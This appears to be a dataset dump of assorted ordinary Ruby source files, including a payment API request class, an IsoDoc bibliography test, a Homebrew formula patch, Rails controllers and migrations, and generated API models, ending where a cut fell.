hexsha: stringlengths 40 to 40
size: int64 2 to 1.01M
content: stringlengths 2 to 1.01M
avg_line_length: float64 1.5 to 100
max_line_length: int64 2 to 1k
alphanum_fraction: float64 0.25 to 1
2142210cfe5cf3708d5ffa5574506a4c5747f904
961
module Bambora::API
  class ProfileRequest
    attr_accessor :card, :token, :billing, :custom, :language, :comment, :validate

    def initialize(args = {})
      if args.kind_of? Token
        self.token = args
      else
        args = {} if args.nil?
        args.symbolize_keys!
        self.card = Card.new(args[:card]) unless args[:card].nil?
        self.token = Token.new(args[:token]) unless args[:token].nil?
        self.billing = Address.new(args[:billing]) unless args[:billing].nil?
        self.custom = Custom.new(args[:custom]) unless args[:custom].nil?
        self.validate = args[:validate]
      end
    end

    def to_h
      h = { billing: billing, validate: validate }
      h.merge!( card: card.to_h ) unless card.nil?
      h.merge!( token: (token.kind_of?(Token) ? token.to_h : token) ) unless token.nil?
      h.merge!( custom: custom.to_h ) unless custom.nil?
      h
    end

    def to_json
      to_h.to_json
    end
  end
end
29.121212
87
0.609781
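For orientation, a minimal usage sketch of the ProfileRequest class above. It assumes the surrounding Bambora::API models (Card, Address) and ActiveSupport's symbolize_keys! are loaded; the attribute keys in the hashes are illustrative placeholders, not the gem's documented fields.

# Hypothetical illustration only: build a profile request from plain hashes and
# serialize it for the API. Card/Address field names below are assumptions.
request = Bambora::API::ProfileRequest.new(
  card:     { number: '4030000010001234', expiry_month: '12', expiry_year: '29' },
  billing:  { name: 'Jane Doe', city: 'Victoria' },
  validate: true
)
puts request.to_json # JSON body built from ProfileRequest#to_h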
620ae83179ef6c39dc93a90e588c4e8af61ca9b3
18,568
require "spec_helper" RSpec.describe IsoDoc do it "processes IsoXML bibliographies" do input = <<~INPUT <iso-standard xmlns="http://riboseinc.com/isoxml"> <bibdata> <language>en</language> </bibdata> <preface> <foreword> <p id="_f06fd0d1-a203-4f3d-a515-0bdba0f8d83f"> <eref bibitemid="ISO712"/> <eref bibitemid="ISBN"/> <eref bibitemid="ISSN"/> <eref bibitemid="ISO16634"/> <eref bibitemid="ref1"/> <eref bibitemid="ref10"/> <eref bibitemid="ref12"/> </p> </foreword> </preface> <bibliography> <references id="_normative_references" normative="true" obligation="informative"> <title>Normative References</title> <p>The following documents are referred to in the text in such a way that some or all of their content constitutes requirements of this document. For dated references, only the edition cited applies. For undated references, the latest edition of the referenced document (including any amendments) applies.</p> <bibitem id="ISO712" type="standard"> <title format="text/plain">Cereals or cereal products</title> <title format="text/plain" type="main">Cereals and cereal products</title> <docidentifier type="ISO">ISO 712</docidentifier> <contributor> <role type="publisher"/> <organization> <name>International Organization for Standardization</name> </organization> </contributor> </bibitem> <bibitem id="ISO16634" type="standard"> <title format="text/plain" language="x">Cereals, pulses, milled cereal products, xxxx, oilseeds and animal feeding stuffs</title> <title format="text/plain" language="en">Cereals, pulses, milled cereal products, oilseeds and animal feeding stuffs</title> <docidentifier type="ISO">ISO 16634:-- (all parts)</docidentifier> <date type="published"> <on>--</on> </date> <contributor> <role type="publisher"/> <organization> <abbreviation>ISO</abbreviation> </organization> </contributor> <note format="text/plain" reference="1" type="Unpublished-Status">Under preparation. (Stage at the time of publication ISO/DIS 16634)</note> <extent type="part"> <referenceFrom>all</referenceFrom> </extent> </bibitem> <bibitem id="ISO20483" type="standard"> <title format="text/plain">Cereals and pulses</title> <docidentifier type="ISO">ISO 20483:2013-2014</docidentifier> <date type="published"> <from>2013</from> <to>2014</to> </date> <contributor> <role type="publisher"/> <organization> <name>International Organization for Standardization</name> </organization> </contributor> </bibitem> <bibitem id="ref1"> <formattedref format="application/x-isodoc+xml"> <smallcap>Standard No I.C.C 167</smallcap> . 
<em>Determination of the protein content in cereal and cereal products for food and animal feeding stuffs according to the Dumas combustion method</em> (see <link target="http://www.icc.or.at"/> )</formattedref> <docidentifier type="ICC">167</docidentifier> </bibitem> <note> <p>This is an annotation of ISO 20483:2013-2014</p> </note> </references> <references id="_bibliography" normative="false" obligation="informative"> <title>Bibliography</title> <bibitem id="ISBN" type="ISBN"> <title format="text/plain">Chemicals for analytical laboratory use</title> <docidentifier type="ISBN">ISBN</docidentifier> <docidentifier type="metanorma">[1]</docidentifier> <contributor> <role type="publisher"/> <organization> <abbreviation>ISBN</abbreviation> </organization> </contributor> </bibitem> <bibitem id="ISSN" type="ISSN"> <title format="text/plain">Instruments for analytical laboratory use</title> <docidentifier type="ISSN">ISSN</docidentifier> <docidentifier type="metanorma">[2]</docidentifier> <contributor> <role type="publisher"/> <organization> <abbreviation>ISSN</abbreviation> </organization> </contributor> </bibitem> <note> <p>This is an annotation of document ISSN.</p> </note> <note> <p>This is another annotation of document ISSN.</p> </note> <bibitem id="ISO3696" type="standard"> <title format="text/plain">Water for analytical laboratory use</title> <docidentifier type="ISO">ISO 3696</docidentifier> <contributor> <role type="publisher"/> <organization> <abbreviation>ISO</abbreviation> </organization> </contributor> </bibitem> <bibitem id="ref10"> <formattedref format="application/x-isodoc+xml"> <smallcap>Standard No I.C.C 167</smallcap> . <em>Determination of the protein content in cereal and cereal products for food and animal feeding stuffs according to the Dumas combustion method</em> (see <link target="http://www.icc.or.at"/> )</formattedref> <docidentifier type="metanorma">[10]</docidentifier> </bibitem> <bibitem id="ref11"> <title>Internet Calendaring and Scheduling Core Object Specification (iCalendar)</title> <docidentifier type="IETF">RFC 10</docidentifier> </bibitem> <bibitem id="ref12"> <formattedref format="application/x-isodoc+xml">CitationWorks. 2019. <em>How to cite a reference</em> .</formattedref> <docidentifier type="metanorma">[Citn]</docidentifier> <docidentifier type="IETF">RFC 20</docidentifier> </bibitem> </references> </bibliography> </iso-standard> INPUT presxml = <<~OUTPUT <iso-standard type="presentation" xmlns="http://riboseinc.com/isoxml"> <bibdata> <language current="true">en</language> </bibdata> <preface> <foreword displayorder="1"> <p id="_f06fd0d1-a203-4f3d-a515-0bdba0f8d83f"> <eref bibitemid="ISO712">ISO 712</eref> <eref bibitemid="ISBN">[1]</eref> <eref bibitemid="ISSN">[2]</eref> <eref bibitemid="ISO16634">ISO 16634:--</eref> <eref bibitemid="ref1">ICC 167</eref> <eref bibitemid="ref10">[10]</eref> <eref bibitemid="ref12">Citn</eref> </p> </foreword> </preface> <bibliography> <references id="_normative_references" normative="true" obligation="informative" displayorder="2"> <title depth="1">1<tab/>Normative References</title> <p>The following documents are referred to in the text in such a way that some or all of their content constitutes requirements of this document. For dated references, only the edition cited applies. For undated references, the latest edition of the referenced document (including any amendments) applies. 
</p> <bibitem id="ISO712" type="standard"> <title format="text/plain">Cereals or cereal products</title> <title format="text/plain" type="main">Cereals and cereal products</title> <docidentifier type="ISO">ISO 712</docidentifier> <contributor> <role type="publisher"/> <organization> <name>International Organization for Standardization</name> </organization> </contributor> </bibitem> <bibitem id="ISO16634" type="standard"> <title format="text/plain" language="x">Cereals, pulses, milled cereal products, xxxx, oilseeds and animal feeding stuffs </title> <title format="text/plain" language="en">Cereals, pulses, milled cereal products, oilseeds and animal feeding stuffs</title> <docidentifier type="ISO">ISO 16634:-- (all parts)</docidentifier> <date type="published"> <on>--</on> </date> <contributor> <role type="publisher"/> <organization> <abbreviation>ISO</abbreviation> </organization> </contributor> <note format="text/plain" reference="1" type="Unpublished-Status">Under preparation. (Stage at the time of publication ISO/DIS 16634)</note> <extent type="part"> <referenceFrom>all</referenceFrom> </extent> </bibitem> <bibitem id="ISO20483" type="standard"> <title format="text/plain">Cereals and pulses</title> <docidentifier type="ISO">ISO 20483:2013-2014</docidentifier> <date type="published"> <from>2013</from> <to>2014</to> </date> <contributor> <role type="publisher"/> <organization> <name>International Organization for Standardization</name> </organization> </contributor> </bibitem> <bibitem id="ref1"> <formattedref format="application/x-isodoc+xml"> <smallcap>Standard No I.C.C 167</smallcap> . <em>Determination of the protein content in cereal and cereal products for food and animal feeding stuffs according to the Dumas combustion method</em> (see <link target="http://www.icc.or.at"/> )</formattedref> <docidentifier type="ICC">ICC 167</docidentifier> </bibitem> <note> <name>NOTE</name> <p>This is an annotation of ISO 20483:2013-2014</p> </note> </references> <references id="_bibliography" normative="false" obligation="informative" displayorder="3"> <title depth="1">Bibliography</title> <bibitem id="ISBN" type="ISBN"> <title format="text/plain">Chemicals for analytical laboratory use</title> <docidentifier type="ISBN">ISBN</docidentifier> <docidentifier type="metanorma">[1]</docidentifier> <contributor> <role type="publisher"/> <organization> <abbreviation>ISBN</abbreviation> </organization> </contributor> </bibitem> <bibitem id="ISSN" type="ISSN"> <title format="text/plain">Instruments for analytical laboratory use</title> <docidentifier type="ISSN">ISSN</docidentifier> <docidentifier type="metanorma">[2]</docidentifier> <contributor> <role type="publisher"/> <organization> <abbreviation>ISSN</abbreviation> </organization> </contributor> </bibitem> <note> <name>NOTE</name> <p>This is an annotation of document ISSN.</p> </note> <note> <name>NOTE</name> <p>This is another annotation of document ISSN.</p> </note> <bibitem id="ISO3696" type="standard"> <title format="text/plain">Water for analytical laboratory use</title> <docidentifier type='metanorma-ordinal'>[3]</docidentifier> <docidentifier type="ISO">ISO 3696</docidentifier> <contributor> <role type="publisher"/> <organization> <abbreviation>ISO</abbreviation> </organization> </contributor> </bibitem> <bibitem id="ref10"> <formattedref format="application/x-isodoc+xml"> <smallcap>Standard No I.C.C 167</smallcap> . 
<em>Determination of the protein content in cereal and cereal products for food and animal feeding stuffs according to the Dumas combustion method</em> (see <link target="http://www.icc.or.at"/> )</formattedref> <docidentifier type="metanorma">[10]</docidentifier> </bibitem> <bibitem id="ref11"> <title>Internet Calendaring and Scheduling Core Object Specification (iCalendar)</title> <docidentifier type='metanorma-ordinal'>[4]</docidentifier> <docidentifier type="IETF">IETF RFC 10</docidentifier> </bibitem> <bibitem id="ref12"> <formattedref format="application/x-isodoc+xml">CitationWorks. 2019. <em>How to cite a reference</em> .</formattedref> <docidentifier type="metanorma">[Citn]</docidentifier> <docidentifier type="IETF">IETF RFC 20</docidentifier> </bibitem> </references> </bibliography> </iso-standard> OUTPUT html = <<~OUTPUT #{HTML_HDR} <br/> <div> <h1 class="ForewordTitle">Foreword</h1> <p id="_f06fd0d1-a203-4f3d-a515-0bdba0f8d83f"> <a href="#ISO712">ISO 712</a> <a href="#ISBN">[1]</a> <a href="#ISSN">[2]</a> <a href="#ISO16634">ISO 16634:--</a> <a href="#ref1">ICC 167</a> <a href="#ref10">[10]</a> <a href="#ref12">Citn</a> </p> </div> <p class="zzSTDTitle1"/> <div> <h1>1&#160; Normative References</h1> <p>The following documents are referred to in the text in such a way that some or all of their content constitutes requirements of this document. For dated references, only the edition cited applies. For undated references, the latest edition of the referenced document (including any amendments) applies.</p> <p class="NormRef" id="ISO712">ISO 712, <i>Cereals and cereal products</i></p> <p class="NormRef" id="ISO16634">ISO 16634:-- (all parts) <a class="FootnoteRef" href="#fn:1"> <sup>1</sup></a>, <i>Cereals, pulses, milled cereal products, oilseeds and animal feeding stuffs</i></p> <p class="NormRef" id="ISO20483">ISO 20483:2013-2014, <i>Cereals and pulses</i></p> <p class="NormRef" id="ref1">ICC 167, <span style="font-variant:small-caps;">Standard No I.C.C 167</span> . <i>Determination of the protein content in cereal and cereal products for food and animal feeding stuffs according to the Dumas combustion method</i> (see <a href="http://www.icc.or.at">http://www.icc.or.at</a> )</p> <div class="Note"> <p> <span class="note_label">NOTE</span>&#160; This is an annotation of ISO 20483:2013-2014</p> </div> </div> <br/> <div> <h1 class="Section3">Bibliography</h1> <p class="Biblio" id="ISBN">[1]&#160; <i>Chemicals for analytical laboratory use</i></p> <p class="Biblio" id="ISSN">[2]&#160; <i>Instruments for analytical laboratory use</i></p> <div class="Note"> <p> <span class="note_label">NOTE</span>&#160; This is an annotation of document ISSN.</p> </div> <div class="Note"> <p> <span class="note_label">NOTE</span>&#160; This is another annotation of document ISSN.</p> </div> <p class="Biblio" id="ISO3696">[3]&#160; ISO 3696, <i>Water for analytical laboratory use</i></p> <p class="Biblio" id="ref10">[10]&#160; <span style="font-variant:small-caps;">Standard No I.C.C 167</span> . <i>Determination of the protein content in cereal and cereal products for food and animal feeding stuffs according to the Dumas combustion method</i> (see <a href="http://www.icc.or.at">http://www.icc.or.at</a> )</p> <p class="Biblio" id="ref11">[4]&#160; IETF RFC 10, <i>Internet Calendaring and Scheduling Core Object Specification (iCalendar)</i></p> <p class="Biblio" id="ref12">Citn&#160; IETF RFC 20, CitationWorks. 2019. 
<i>How to cite a reference</i> .</p> </div> <aside class="footnote" id="fn:1"> <p>Under preparation. (Stage at the time of publication ISO/DIS 16634)</p> </aside> </div> </body> </html> OUTPUT expect(xmlpp(IsoDoc::Iso::PresentationXMLConvert.new({}) .convert("test", input, true)) .sub(%r{<localized-strings>.*</localized-strings>}m, "")) .to be_equivalent_to xmlpp(presxml) expect(xmlpp(IsoDoc::Iso::HtmlConvert.new({}) .convert("test", presxml, true))) .to be_equivalent_to xmlpp(html) end end
46.888889
323
0.533121
e8297dd2ad4ca13dd09d498a74e68919384cc7b6
544
desc "Project issues tools - sub-commands : open [user], closed [user]" flags :after => "Only show issues updated after a certain date" flags :label => "Only show issues with a certain label" command :issues do |command, user| return if !helper.project user ||= helper.owner case command when 'open', 'closed' report = YAML.load(open(@helper.list_issues_for(user, command))) @helper.print_issues(report['issues'], options) when 'web' helper.open helper.issues_page_for(user) else helper.print_issues_help end end
30.222222
71
0.715074
33796004d9f07adb805a9de9643812fda494c299
42
module Giferizer
  VERSION = "0.1.0"
end
10.5
19
0.666667
f7801db8f4948833c6678f1b4ebefbf63b2a8aef
1,757
require 'formula'

class Libdlna < Formula
  homepage 'http://libdlna.geexbox.org/'
  url 'http://libdlna.geexbox.org/releases/libdlna-0.2.4.tar.bz2'
  sha1 '5e86f4443eeb9e7194c808301efeb78611a9e8b3'

  depends_on 'ffmpeg'

  # Use dylib instead of soname
  patch :DATA

  def install
    system "./configure", "--disable-debug", "--prefix=#{prefix}"
    system "make install"
  end
end

__END__
diff --git a/src/Makefile b/src/Makefile
index 3e6f704..9701878 100644
--- a/src/Makefile
+++ b/src/Makefile
@@ -21,10 +21,10 @@ ifeq ($(DEVELOPER),yes)
 endif

 LIBNAME = libdlna
-LIBNAME_SHARED = ${LIBNAME}.so
+LIBNAME_SHARED = ${LIBNAME}.dylib
 LIBNAME_STATIC = ${LIBNAME}.a
-LIBNAME_VERSION = $(LIBNAME_SHARED).$(VERSION)
-LIBNAME_MAJOR = $(LIBNAME_SHARED).$(shell echo $(VERSION) | cut -f1 -d.)
+LIBNAME_VERSION = $(LIBNAME).$(VERSION).dylib
+LIBNAME_MAJOR = $(LIBNAME).$(shell echo $(VERSION) | cut -f1 -d.).dylib

 SRCS = profiles.c \
        containers.c \
@@ -97,8 +97,9 @@ lib_shared_info_post:
 	@echo "#############################################"

 lib_shared: lib_shared_info_pre $(LOBJS) lib_shared_info_post
-	$(CC) -shared -Wl,-soname,$(LIBNAME_MAJOR) $(LOBJS) \
-	  $(LDFLAGS) $(EXTRALIBS) -o $(LIBNAME_VERSION)
+	$(CC) -dynamiclib $(LOBJS) $(LDFLAGS) $(EXTRALIBS) -o $(LIBNAME_VERSION) \
+	  -Wl,-install_name,$(PREFIX)/lib/$(LIBNAME_VERSION) \
+	  -Wl,-compatibility_version,$(VERSION) -Wl,-current_version,$(VERSION)
 	$(LN) -sf $(LIBNAME_VERSION) $(LIBNAME_MAJOR)
 	$(LN) -sf $(LIBNAME_MAJOR) $(LIBNAME_SHARED)

@@ -111,7 +112,7 @@ tags:
 	( find -name '*.[chS]' -print ) | xargs ctags -a;

 clean:
-	-$(RM) -f *.o *.lo *.a *.so*
+	-$(RM) -f *.o *.lo *.a *.dylib
 	-$(RM) -f .depend

 install_static: lib_static
29.283333
76
0.635743
ac0cf566fb2b04e77c8338de40bce06718076641
116
# frozen_string_literal: true

require 'test_helper'

module OmniAuth
  class BCryptTest < Minitest::Test
  end
end
12.888889
35
0.775862
878f06195e9e2641d60d4d00600274b6ea002ac2
880
require 'messages/metadata_base_message'
require 'messages/validators'

module VCAP::CloudController
  class BuildpackCreateMessage < MetadataBaseMessage
    MAX_BUILDPACK_NAME_LENGTH = 250
    MAX_STACK_LENGTH = 250

    register_allowed_keys [:name, :stack, :position, :enabled, :locked]
    validates_with NoAdditionalKeysValidator

    validates :name,
      string: true,
      presence: true,
      allow_nil: false,
      length: { maximum: MAX_BUILDPACK_NAME_LENGTH },
      format: /\A[-\w]+\z/

    validates :stack,
      string: true,
      allow_nil: true,
      length: { maximum: MAX_STACK_LENGTH }

    validates :position,
      allow_nil: true,
      numericality: { greater_than_or_equal_to: 1, only_integer: true }

    validates :enabled,
      allow_nil: true,
      boolean: true

    validates :locked,
      allow_nil: true,
      boolean: true
  end
end
23.783784
71
0.680682
87ca79e4989b96b5b3b70a353180c77288f9b9ad
66
require 'coveralls'
Coveralls.wear_merged!

require 'test_config'
13.2
22
0.818182
f8528e0223a6775b1f4215b2eb8b564ff2d4b68e
1,456
class ApplicationHelper::Toolbar::CloudObjectStoreObjectsCenter < ApplicationHelper::Toolbar::Basic
  button_group(
    'cloud_object_store_object_vmdb',
    [
      select(
        :cloud_object_store_object_vmdb_choice,
        nil,
        t = N_('Configuration'),
        t,
        :enabled => false,
        :onwhen  => "1+",
        :items   => [
          button(
            :cloud_object_store_object_delete,
            'pficon pficon-delete fa-lg',
            N_('Remove selected Object Storage Objects from Inventory'),
            N_('Remove Object Storage Objects from Inventory'),
            :url_parms    => "main_div",
            :send_checked => true,
            :confirm      => N_("Warning: The selected Object Storage Object will be permanently removed!"),
            :enabled      => false,
            :onwhen       => "1+"
          ),
        ]
      ),
    ]
  )
  button_group('cloud_object_store_object_policy', [
    select(
      :cloud_object_store_object_policy_choice,
      nil,
      t = N_('Policy'),
      t,
      :enabled => false,
      :onwhen  => "1+",
      :items   => [
        button(
          :cloud_object_store_object_tag,
          'pficon pficon-edit fa-lg',
          N_('Edit tags for the selected items'),
          N_('Edit Tags'),
          :url_parms    => "main_div",
          :send_checked => true,
          :enabled      => false,
          :onwhen       => "1+")
      ]
    )
  ])
end
29.12
108
0.524038
abb096c42428e855a9811e04a9267b17ce15240f
824
require 'spec_helper'

module Bosh::Director::DeploymentPlan
  module PlacementPlanner
    describe TieStrategy do
      let(:az1) { AvailabilityZone.new("1", {}) }
      let(:az2) { AvailabilityZone.new("2", {}) }
      let(:az3) { AvailabilityZone.new("3", {}) }

      describe TieStrategy::MinWins do
        subject { described_class.new }

        it 'chooses the minimum' do
          expect(subject.call([az1, az2])).to eq(az1)
        end
      end

      describe TieStrategy::RandomWins do
        subject { described_class.new(random: fake_random) }

        let(:fake_random) do
          r = Object.new
          def r.rand(n)
            1
          end
          r
        end

        it 'chooses a random az' do
          expect(subject.call([az1, az2])).to eq(az2)
        end
      end
    end
  end
end
22.888889
60
0.56068
18284dcc9336cc6bfd1529e3ffa8629e511a4633
5,257
=begin PureCloud Platform API With the PureCloud Platform API, you can control all aspects of your PureCloud environment. With the APIs you can access the system configuration, manage conversations and more. OpenAPI spec version: v2 Contact: [email protected] Generated by: https://github.com/swagger-api/swagger-codegen.git License: UNLICENSED https://help.mypurecloud.com/articles/terms-and-conditions/ Terms of Service: https://help.mypurecloud.com/articles/terms-and-conditions/ =end require 'date' module PureCloud class ConversationSocialExpressionEventTopicUriReference attr_accessor :id attr_accessor :name # Attribute mapping from ruby-style variable name to JSON key. def self.attribute_map { :'id' => :'id', :'name' => :'name' } end # Attribute type mapping. def self.swagger_types { :'id' => :'String', :'name' => :'String' } end # Initializes the object # @param [Hash] attributes Model attributes in the form of hash def initialize(attributes = {}) return unless attributes.is_a?(Hash) # convert string to symbol for hash key attributes = attributes.each_with_object({}){|(k,v), h| h[k.to_sym] = v} if attributes.has_key?(:'id') self.id = attributes[:'id'] end if attributes.has_key?(:'name') self.name = attributes[:'name'] end end # Show invalid properties with the reasons. Usually used together with valid? # @return Array for valid properies with the reasons def list_invalid_properties invalid_properties = Array.new return invalid_properties end # Check to see if the all the properties in the model are valid # @return true if the model is valid def valid? end # Checks equality by comparing each attribute. # @param [Object] Object to be compared def ==(o) return true if self.equal?(o) self.class == o.class && id == o.id && name == o.name end # @see the `==` method # @param [Object] Object to be compared def eql?(o) self == o end # Calculates hash code according to all attributes. # @return [Fixnum] Hash code def hash [id, name].hash end # build the object from hash def build_from_hash(attributes) return nil unless attributes.is_a?(Hash) self.class.swagger_types.each_pair do |key, type| if type =~ /^Array<(.*)>/i if attributes[self.class.attribute_map[key]].is_a?(Array) self.send("#{key}=", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } ) else #TODO show warning in debug mode end elsif !attributes[self.class.attribute_map[key]].nil? 
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]])) else # data not found in attributes(hash), not an issue as the data can be optional end end self end def _deserialize(type, value) case type.to_sym when :DateTime DateTime.parse(value) when :Date Date.parse(value) when :String value.to_s when :Integer value.to_i when :Float value.to_f when :BOOLEAN if value.to_s =~ /^(true|t|yes|y|1)$/i true else false end when :Object # generic object (usually a Hash), return directly value when /\AArray<(?<inner_type>.+)>\z/ inner_type = Regexp.last_match[:inner_type] value.map { |v| _deserialize(inner_type, v) } when /\AHash<(?<k_type>.+), (?<v_type>.+)>\z/ k_type = Regexp.last_match[:k_type] v_type = Regexp.last_match[:v_type] {}.tap do |hash| value.each do |k, v| hash[_deserialize(k_type, k)] = _deserialize(v_type, v) end end else # model _model = Object.const_get("PureCloud").const_get(type).new _model.build_from_hash(value) end end def to_s to_hash.to_s end # to_body is an alias to to_body (backward compatibility)) def to_body to_hash end # return the object in the form of hash def to_hash hash = {} self.class.attribute_map.each_pair do |attr, param| value = self.send(attr) next if value.nil? hash[param] = _to_hash(value) end hash end # Method to output non-array value in the form of hash # For object, use to_hash. Otherwise, just return the value def _to_hash(value) if value.is_a?(Array) value.compact.map{ |v| _to_hash(v) } elsif value.is_a?(Hash) {}.tap do |hash| value.each { |k, v| hash[k] = _to_hash(v) } end elsif value.respond_to? :to_hash value.to_hash else value end end end end
23.15859
177
0.576374
1a557c2c98c40a366a3e507eecf88d8eeb3896e1
282
module HealthSeven::V2_7_1
  class QcnJ01 < ::HealthSeven::Message
    attribute :msh, Msh, position: "MSH", require: true
    attribute :sfts, Array[Sft], position: "SFT", multiple: true
    attribute :uac, Uac, position: "UAC"
    attribute :qid, Qid, position: "QID", require: true
  end
end
35.25
62
0.716312
398d40a73f27f7148dd3fed77c826a93172bd47f
288
require 'test_helper'

class EnrollmentsControllerTest < ActionDispatch::IntegrationTest
  test 'should get create' do
    get enrollments_create_url
    assert_response :success
  end

  test 'should get destroy' do
    get enrollments_destroy_url
    assert_response :success
  end
end
20.571429
65
0.777778
035481759b080fc862705c4d06356cb8d664f85f
684
# frozen_string_literal: true

require 'spec_helper_acceptance'

describe 'letsencrypt::plugin::dns_route53' do
  context 'with defaults values' do
    pp = <<-PUPPET
      class { 'letsencrypt' :
        email  => '[email protected]',
        config => {
          'server' => 'https://acme-staging-v02.api.letsencrypt.org/directory',
        },
      }
      class { 'letsencrypt::plugin::dns_route53': }
    PUPPET

    it 'installs letsencrypt and dns route53 plugin without error' do
      apply_manifest(pp, catch_failures: true)
    end

    it 'installs letsencrypt and dns route53 idempotently' do
      apply_manifest(pp, catch_changes: true)
    end
  end
end
25.333333
79
0.653509
61d245689325bd352c011736bcb9654e9c8852cc
1,041
# frozen_string_literal: true

module GraphQL
  module Execution
    # Boolean checks for how an AST node's directives should
    # influence its execution
    module DirectiveChecks
      SKIP = "skip"
      INCLUDE = "include"

      module_function

      # @return [Boolean] Should this node be included in the query?
      def include?(directive_irep_nodes, query)
        directive_irep_nodes.each do |directive_irep_node|
          name = directive_irep_node.name
          directive_defn = query.schema.directives[name]
          case name
          when SKIP
            args = query.arguments_for(directive_irep_node, directive_defn)
            if args['if'] == true
              return false
            end
          when INCLUDE
            args = query.arguments_for(directive_irep_node, directive_defn)
            if args['if'] == false
              return false
            end
          else
            # Undefined directive, or one we don't care about
          end
        end
        true
      end
    end
  end
end
28.135135
75
0.599424
1a7a7df3f61faa6aac2cee11de39c5b0ac7ff0c7
1,505
require 'test_helper'

class SalesControllerTest < ActionDispatch::IntegrationTest
  setup do
    @sale = sales(:one)
  end

  test "should get index" do
    get sales_url
    assert_response :success
  end

  test "should get new" do
    get new_sale_url
    assert_response :success
  end

  test "should create sale" do
    assert_difference('Sale.count') do
      post sales_url, params: { sale: { comments: @sale.comments, customer_id: @sale.customer_id, customer_name: @sale.customer_name, customer_phone: @sale.customer_phone, date: @sale.date, number_of_items: @sale.number_of_items, payment_method: @sale.payment_method, total_charge: @sale.total_charge, user_id: @sale.user_id } }
    end

    assert_redirected_to sale_url(Sale.last)
  end

  test "should show sale" do
    get sale_url(@sale)
    assert_response :success
  end

  test "should get edit" do
    get edit_sale_url(@sale)
    assert_response :success
  end

  test "should update sale" do
    patch sale_url(@sale), params: { sale: { comments: @sale.comments, customer_id: @sale.customer_id, customer_name: @sale.customer_name, customer_phone: @sale.customer_phone, date: @sale.date, number_of_items: @sale.number_of_items, payment_method: @sale.payment_method, total_charge: @sale.total_charge, user_id: @sale.user_id } }
    assert_redirected_to sale_url(@sale)
  end

  test "should destroy sale" do
    assert_difference('Sale.count', -1) do
      delete sale_url(@sale)
    end

    assert_redirected_to sales_url
  end
end
30.714286
333
0.73289
f74d1a8ab41b2808b52a4140272e44ae9440019c
230
require 'spec_helper'

describe ChinaCity::DataController do
  describe "GET 'show'" do
    it "returns http success" do
      get 'show', id: '000000', use_route: 'china_city'
      response.should be_success
    end
  end
end
17.692308
55
0.682609
62620f93304999e31f9fcab84f614969782155f3
1,470
# typed: true

class Parent
  extend T::Helpers
  extend T::Sig

  abstract!

  # This should fail, as `T.attached_class` doesn't make sense in an instance
  # method context.
  sig {returns(T.nilable(T.experimental_attached_class))}
  #                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ error: `T.experimental_attached_class` may only be
  def bad_sig
    nil
  end

  sig {returns(T.nilable(T.experimental_attached_class))}
  def self.make()
    # TODO(trevor): It would be nice if this could be `new`, but that's running
    # into problems when checking the concrete type returned by `Class#new`
    # against the `T.attached_class` param.
    nil
  end
end

class Child < Parent; end
class GrandChild < Child; end

T.reveal_type(Child.make) # error: Revealed type: `T.nilable(Child)`
T.reveal_type(GrandChild.make) # error: Revealed type: `T.nilable(GrandChild)`

T.reveal_type(T::Array[Integer].new) # error: Revealed type: `T::Array[Integer]`

# Ensure that untyped generics still work correctly
T.reveal_type(Array.new) # error: Revealed type: `T::Array[T.untyped]`

# File is an interesting case because its `Elem` type member is fixed as String.
# When `T.attached_class` is bounded at the wrong time, the use of `externalType`
# will default this incorrectly, and the use of `File.new` without specifying
# the parameters will cause this to turn into `T.untyped` instead.
T.reveal_type(File.new("foo", "r").first) # error: Revealed type: `T.nilable(String)`
35
105
0.704082
f85a5c7704c8960df7e3772ccd4d55ac5aaf379e
680
module YoudaoFanyiAPI
  module Configuration
    VALID_OPTIONS = %i[key keyfrom].freeze
    DEFAULT_OPTIONS = %i[type doctype version].freeze
    OPTIONS = VALID_OPTIONS + DEFAULT_OPTIONS

    DEFAULT_TYPE = 'data'
    DEFAULT_DOCTYPE = 'json'
    DEFAULT_VERSION = '1.1'

    attr_accessor *OPTIONS

    def self.extended(base)
      base.reset
    end

    def reset
      self.key = nil
      self.keyfrom = nil
      self.type = DEFAULT_TYPE
      self.doctype = DEFAULT_DOCTYPE
      self.version = DEFAULT_VERSION
    end

    def configure
      yield self
    end

    def options
      OPTIONS.collect { |key| [key, send(key)] }.to_h
    end
  end
end
20.606061
53
0.629412
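A brief usage sketch for the Configuration mixin above; the receiving module and the credential values are illustrative assumptions (the gem itself decides what actually extends this module).

# Hypothetical usage: extend a namespace with the mixin; the `extended` hook
# calls `reset`, which seeds the defaults before `configure` overrides them.
module YoudaoFanyiAPI
  extend Configuration
end

YoudaoFanyiAPI.configure do |config|
  config.key     = 'demo-key'     # placeholder credential
  config.keyfrom = 'demo-keyfrom' # placeholder credential
end

YoudaoFanyiAPI.options
# => {:key=>"demo-key", :keyfrom=>"demo-keyfrom", :type=>"data", :doctype=>"json", :version=>"1.1"}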
21116c11d42f5057b135e541e9943c8a2b3a5c02
127
require 'test_helper'

class CastingPersonTest < ActiveSupport::TestCase
  # test "the truth" do
  #   assert true
  # end
end
15.875
49
0.716535
395f53d9b934f2e9ae11f73e823fc911b93da1c9
106
RSpec.describe Coals do
  it 'has a version number' do
    expect(Coals::VERSION).not_to be nil
  end
end
17.666667
40
0.716981
26113c315693430b85e5a5edca0e81ce56ae4933
247
require File.expand_path('../lib/vega-previewer', __FILE__)

directory = File.expand_path('../vega', __FILE__)

server = VegaPreviewer::Server.new(directory)
listener = VegaPreviewer::Listener.new(directory, server)
listener.start

run server
24.7
59
0.761134
614100d665e4b30f9c736e1a2f731a8788c1798c
405
class CreateApplicantDetails < ActiveRecord::Migration
  def change
    create_table :applicant_details do |t|
      t.string :name
      t.string :email
      t.string :phonenumber
      t.string :location
      t.integer :experience
      t.integer :min_salary
      t.integer :max_salary
      t.references :requirement, index: true, foreign_key: true

      t.timestamps null: false
    end
  end
end
23.823529
63
0.676543
0305e0cf1198cdddc53611fc249bc26ec3ea04c3
513
# encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.

module Azure::MediaServices::Mgmt::V2019_05_01_preview
  module Models
    #
    # Defines values for JobState
    #
    module JobState
      Canceled = "Canceled"
      Canceling = "Canceling"
      Error = "Error"
      Finished = "Finished"
      Processing = "Processing"
      Queued = "Queued"
      Scheduled = "Scheduled"
    end
  end
end
23.318182
70
0.664717
38c38d4d83df36ace991b5cae06d612b9dc05225
1,611
Pod::Spec.new do |s|
